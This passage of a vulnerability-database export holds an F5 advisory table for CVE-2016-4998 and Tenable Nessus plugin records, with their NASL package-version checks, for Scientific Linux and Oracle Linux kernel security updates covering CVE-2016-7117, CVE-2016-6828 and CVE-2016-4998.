is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP AAM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable1| None \nBIG-IP AFM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable1| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP APM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP ASM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP DNS| None| 12.0.0 - 12.1.2| Not vulnerable1| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable1| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable1| None \nBIG-IP PEM| None| 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable1| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable1| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable1| None \nBIG-IP WebSafe| None| 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable1| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable1| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable1| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable1| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable1| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable1| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.1.0 \n4.6.0| Not vulnerable1| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable1| None \nF5 iWorkflow| None| 2.0.0 - 2.0.2| Not vulnerable1| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable1| None \nTraffix SDC| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| None| Low| Linux kernel \n \n1 The specified products contain the affected code. However, F5 identifies the vulnerability status as Not vulnerable because the attacker cannot exploit the code in default, standard, or recommended configurations.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "reporter": "f5", "published": "2017-02-22T20:06:00", "type": "f5", "title": "Linux kernel vulnerability CVE-2016-4998", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2016-4998"], "modified": "2017-03-14T00:54:00", "href": "https://support.f5.com/csp/article/K74171196", "id": "F5:K74171196", "cvss": {"score": 5.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2018-09-01T23:43:40", "references": ["http://www.nessus.org/u?67218412"], "pluginID": "96481", "description": "Security Fix(es) :\n\n - A use-after-free vulnerability was found in the kernels socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function. (CVE-2016-7117, Important)\n\n - An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\n - A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions.\n This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection.\n (CVE-2016-6828, Moderate)\n\nBug Fix(es) :\n\n - When parallel NFS returned a file layout, a kernel crash sometimes occurred. This update removes the call to the BUG_ON() function from a code path of a client that returns the file layout. As a result, the kernel no longer crashes in the described situation.\n\n - When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash on a Nonmaskable Interrupt (NMI) that was injected from the host, this VM became unresponsive and did not create the vmcore dump file. This update applies a set of patches to the Virtual Machine Bus kernel driver (hv_vmbus) that fix this bug. As a result, the VM now first creates and saves the vmcore dump file and then reboots.\n\n - From Scientific Linux 6.6 to 6.8, the IPv6 routing cache occasionally showed incorrect values. This update fixes the DST_NOCOUNT mechanism, and the IPv6 routing cache now shows correct values.\n\n - When using the ixgbe driver and the software Fibre Channel over Ethernet (FCoE) stack, suboptimal performance in some cases occurred on systems with a large number of CPUs. This update fixes the fc_exch_alloc() function to try all the available exchange managers in the list for an available exchange ID. This change avoids failing allocations, which previously led to the host busy status.\n\n - When the vmwgfx kernel module loads, it overrides the boot resolution automatically. Consequently, users were not able to change the resolution by manual setting of the kernel's 'vga=' parameter in the /boot/grub/grub.conf file. This update adds the 'nomodeset' parameter, which can be set in the /boot/grub/grub.conf file. The 'nomodeset' parameter allows the users to prevent the vmwgfx driver from loading. As a result, the setting of the 'vga=' parameter works as expected, in case that vmwgfx does not load.\n\n - When Scientific Linux 6.8 was booted on SMBIOS 3.0 based systems, Desktop Management Interface (DMI) information, which is referenced by several applications, such as NEC server's memory RAS utility, was missing entries in the sysfs virtual file system. This update fixes the underlying source code, and sysfs now shows the DMI information as expected.\n\n - Previously, bonding mode active backup and the propagation of the media access control (MAC) address to a VLAN interface did not work in Scientific Linux 6.8, when the fail_over_mac bonding parameter was set to fail_over_mac=active. With this update, the underlying source code has been fixed so that the VLANs continue inheriting the MAC address of the active physical interface until the VLAN MAC address is explicitly set to any value. As a result, IPv6 EUI64 addresses for the VLAN can reflect any changes to the MAC address of the physical interface, and Duplicate Address Detection (DAD) behaves as expected.", "edition": 4, "reporter": "Tenable", "published": "2017-01-13T00:00:00", "title": "Scientific Linux Security Update : kernel on SL6.x i386/x86_64", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Scientific Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "modified": "2017-01-13T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20170110_KERNEL_ON_SL6_X.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96481", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96481);\n script_version(\"$Revision: 3.1 $\");\n script_cvs_date(\"$Date: 2017/01/13 14:56:01 $\");\n\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL6.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - A use-after-free vulnerability was found in the kernels\n socket recvmmsg subsystem. This may allow remote\n attackers to corrupt memory and may allow execution of\n arbitrary code. This corruption takes place during the\n error handling routines within __sys_recvmmsg()\n function. (CVE-2016-7117, Important)\n\n - An out-of-bounds heap memory access leading to a Denial\n of Service, heap disclosure, or further impact was found\n in setsockopt(). The function call is normally\n restricted to root, however some processes with\n cap_sys_admin may also be able to trigger this flaw in\n privileged container environments. (CVE-2016-4998,\n Moderate)\n\n - A use-after-free vulnerability was found in\n tcp_xmit_retransmit_queue and other tcp_* functions.\n This condition could allow an attacker to send an\n incorrect selective acknowledgment to existing\n connections, possibly resetting a connection.\n (CVE-2016-6828, Moderate)\n\nBug Fix(es) :\n\n - When parallel NFS returned a file layout, a kernel crash\n sometimes occurred. This update removes the call to the\n BUG_ON() function from a code path of a client that\n returns the file layout. As a result, the kernel no\n longer crashes in the described situation.\n\n - When a guest virtual machine (VM) on Microsoft Hyper-V\n was set to crash on a Nonmaskable Interrupt (NMI) that\n was injected from the host, this VM became unresponsive\n and did not create the vmcore dump file. This update\n applies a set of patches to the Virtual Machine Bus\n kernel driver (hv_vmbus) that fix this bug. As a result,\n the VM now first creates and saves the vmcore dump file\n and then reboots.\n\n - From Scientific Linux 6.6 to 6.8, the IPv6 routing cache\n occasionally showed incorrect values. This update fixes\n the DST_NOCOUNT mechanism, and the IPv6 routing cache\n now shows correct values.\n\n - When using the ixgbe driver and the software Fibre\n Channel over Ethernet (FCoE) stack, suboptimal\n performance in some cases occurred on systems with a\n large number of CPUs. This update fixes the\n fc_exch_alloc() function to try all the available\n exchange managers in the list for an available exchange\n ID. This change avoids failing allocations, which\n previously led to the host busy status.\n\n - When the vmwgfx kernel module loads, it overrides the\n boot resolution automatically. Consequently, users were\n not able to change the resolution by manual setting of\n the kernel's 'vga=' parameter in the\n /boot/grub/grub.conf file. This update adds the\n 'nomodeset' parameter, which can be set in the\n /boot/grub/grub.conf file. The 'nomodeset' parameter\n allows the users to prevent the vmwgfx driver from\n loading. As a result, the setting of the 'vga='\n parameter works as expected, in case that vmwgfx does\n not load.\n\n - When Scientific Linux 6.8 was booted on SMBIOS 3.0 based\n systems, Desktop Management Interface (DMI) information,\n which is referenced by several applications, such as NEC\n server's memory RAS utility, was missing entries in the\n sysfs virtual file system. This update fixes the\n underlying source code, and sysfs now shows the DMI\n information as expected.\n\n - Previously, bonding mode active backup and the\n propagation of the media access control (MAC) address to\n a VLAN interface did not work in Scientific Linux 6.8,\n when the fail_over_mac bonding parameter was set to\n fail_over_mac=active. With this update, the underlying\n source code has been fixed so that the VLANs continue\n inheriting the MAC address of the active physical\n interface until the VLAN MAC address is explicitly set\n to any value. As a result, IPv6 EUI64 addresses for the\n VLAN can reflect any changes to the MAC address of the\n physical interface, and Duplicate Address Detection\n (DAD) behaves as expected.\"\n );\n # http://listserv.fnal.gov/scripts/wa.exe?A2=ind1701&L=scientific-linux-errata&F=&S=&P=3224\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?67218412\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"kernel-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-abi-whitelists-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-debuginfo-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debug-devel-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-debuginfo-common-i686-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-devel-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-doc-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-firmware-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"kernel-headers-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"perf-debuginfo-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"python-perf-debuginfo-2.6.32-642.13.1.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:44:12", "references": ["https://oss.oracle.com/pipermail/el-errata/2017-January/006622.html"], "pluginID": "96401", "description": "From Red Hat Security Advisory 2017:0036 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernels socket recvmmsg subsystem. This may allow remote attackers to corrupt memory and may allow execution of arbitrary code. This corruption takes place during the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service, heap disclosure, or further impact was found in setsockopt(). The function call is normally restricted to root, however some processes with cap_sys_admin may also be able to trigger this flaw in privileged container environments. (CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in tcp_xmit_retransmit_queue and other tcp_* functions. This condition could allow an attacker to send an incorrect selective acknowledgment to existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\nBug Fix(es) :\n\n* When parallel NFS returned a file layout, a kernel crash sometimes occurred. This update removes the call to the BUG_ON() function from a code path of a client that returns the file layout. As a result, the kernel no longer crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to crash on a Nonmaskable Interrupt (NMI) that was injected from the host, this VM became unresponsive and did not create the vmcore dump file. This update applies a set of patches to the Virtual Machine Bus kernel driver (hv_vmbus) that fix this bug. As a result, the VM now first creates and saves the vmcore dump file and then reboots.\n(BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache occasionally showed incorrect values. This update fixes the DST_NOCOUNT mechanism, and the IPv6 routing cache now shows correct values. (BZ#1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over Ethernet (FCoE) stack, suboptimal performance in some cases occurred on systems with a large number of CPUs. This update fixes the fc_exch_alloc() function to try all the available exchange managers in the list for an available exchange ID. This change avoids failing allocations, which previously led to the host busy status.\n(BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot resolution automatically. Consequently, users were not able to change the resolution by manual setting of the kernel's 'vga=' parameter in the /boot/grub/grub.conf file. This update adds the 'nomodeset' parameter, which can be set in the /boot/grub/grub.conf file. The 'nomodeset' parameter allows the users to prevent the vmwgfx driver from loading. As a result, the setting of the 'vga=' parameter works as expected, in case that vmwgfx does not load. (BZ#1392875)\n\n* When Red Hat Enterprise Linux 6.8 was booted on SMBIOS 3.0 based systems, Desktop Management Interface (DMI) information, which is referenced by several applications, such as NEC server's memory RAS utility, was missing entries in the sysfs virtual file system. This update fixes the underlying source code, and sysfs now shows the DMI information as expected. (BZ#1393464)\n\n* Previously, bonding mode active backup and the propagation of the media access control (MAC) address to a VLAN interface did not work in Red Hat Enterprise Linux 6.8, when the fail_over_mac bonding parameter was set to fail_over_mac=active. With this update, the underlying source code has been fixed so that the VLANs continue inheriting the MAC address of the active physical interface until the VLAN MAC address is explicitly set to any value. As a result, IPv6 EUI64 addresses for the VLAN can reflect any changes to the MAC address of the physical interface, and Duplicate Address Detection (DAD) behaves as expected. (BZ#1396479)", "edition": 7, "reporter": "Tenable", "published": "2017-01-11T00:00:00", "title": "Oracle Linux 6 : kernel (ELSA-2017-0036)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7117", "CVE-2016-6828", "CVE-2016-4998"], "modified": "2018-07-24T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:perf", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-abi-whitelists", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-firmware", "p-cpe:/a:oracle:linux:python-perf"], "id": "ORACLELINUX_ELSA-2017-0036.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=96401", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2017:0036 and \n# Oracle Linux Security Advisory ELSA-2017-0036 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96401);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/07/24 18:56:12\");\n\n script_cve_id(\"CVE-2016-4998\", \"CVE-2016-6828\", \"CVE-2016-7117\");\n script_xref(name:\"RHSA\", value:\"2017:0036\");\n\n script_name(english:\"Oracle Linux 6 : kernel (ELSA-2017-0036)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2017:0036 :\n\nAn update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A use-after-free vulnerability was found in the kernels socket\nrecvmmsg subsystem. This may allow remote attackers to corrupt memory\nand may allow execution of arbitrary code. This corruption takes place\nduring the error handling routines within __sys_recvmmsg() function.\n(CVE-2016-7117, Important)\n\n* An out-of-bounds heap memory access leading to a Denial of Service,\nheap disclosure, or further impact was found in setsockopt(). The\nfunction call is normally restricted to root, however some processes\nwith cap_sys_admin may also be able to trigger this flaw in privileged\ncontainer environments. (CVE-2016-4998, Moderate)\n\n* A use-after-free vulnerability was found in\ntcp_xmit_retransmit_queue and other tcp_* functions. This condition\ncould allow an attacker to send an incorrect selective acknowledgment\nto existing connections, possibly resetting a connection.\n(CVE-2016-6828, Moderate)\n\nBug Fix(es) :\n\n* When parallel NFS returned a file layout, a kernel crash sometimes\noccurred. This update removes the call to the BUG_ON() function from a\ncode path of a client that returns the file layout. As a result, the\nkernel no longer crashes in the described situation. (BZ#1385480)\n\n* When a guest virtual machine (VM) on Microsoft Hyper-V was set to\ncrash on a Nonmaskable Interrupt (NMI) that was injected from the\nhost, this VM became unresponsive and did not create the vmcore dump\nfile. This update applies a set of patches to the Virtual Machine Bus\nkernel driver (hv_vmbus) that fix this bug. As a result, the VM now\nfirst creates and saves the vmcore dump file and then reboots.\n(BZ#1385482)\n\n* From Red Hat Enterprise Linux 6.6 to 6.8, the IPv6 routing cache\noccasionally showed incorrect values. This update fixes the\nDST_NOCOUNT mechanism, and the IPv6 routing cache now shows correct\nvalues. (BZ#1391974)\n\n* When using the ixgbe driver and the software Fibre Channel over\nEthernet (FCoE) stack, suboptimal performance in some cases occurred\non systems with a large number of CPUs. This update fixes the\nfc_exch_alloc() function to try all the available exchange managers in\nthe list for an available exchange ID. This change avoids failing\nallocations, which previously led to the host busy status.\n(BZ#1392818)\n\n* When the vmwgfx kernel module loads, it overrides the boot\nresolution automatically. Consequently, users were not able to change\nthe resolution by manual setting of the kernel's 'vga=' parameter in\nthe /boot/grub/grub.conf file. This update adds the 'nomodeset'\nparameter, which can be set in the /boot/grub/grub.conf file. The\n'nomodeset' parameter allows the users to prevent the vmwgfx driver\nfrom loading. As a result, the setting of the 'vga=' parameter works\nas expected, in case that vmwgfx does not load. (BZ#1392875)\n\n* When Red Hat Enterprise Linux 6.8 was booted on SMBIOS 3.0 based\nsystems, Desktop Management Interface (DMI) information, which is\nreferenced by several applications, such as NEC server's memory RAS\nutility, was missing entries in the sysfs virtual file system. This\nupdate fixes the underlying source code, and sysfs now shows the DMI\ninformation as expected. (BZ#1393464)\n\n* Previously, bonding mode active backup and the propagation of the\nmedia access control (MAC) address to a VLAN interface did not work in\nRed Hat Enterprise Linux 6.8, when the fail_over_mac bonding parameter\nwas set to fail_over_mac=active. With this update, the underlying\nsource code has been fixed so that the VLANs continue inheriting the\nMAC address of the active physical interface until the VLAN MAC\naddress is explicitly set to any value. As a result, IPv6 EUI64\naddresses for the VLAN can reflect any changes to the MAC address of\nthe physical interface, and Duplicate Address Detection (DAD) behaves\nas expected. (BZ#1396479)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2017-January/006622.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-abi-whitelists-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-abi-whitelists-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-debug-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-debug-devel-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-devel-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-devel-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-doc-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-doc-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-firmware-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-firmware-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-headers-2.6.32\") && rpm_check(release:\"EL6\", reference:\"kernel-headers-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"perf-2.6.32-642.13.1.el6\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"python-perf-2.6.32-642.13.1.el6\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-11T13:06:05", "references": ["http://www.nessus.org/u?de863180"], "pluginID": "96456", "description": "An update for kernel is now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE 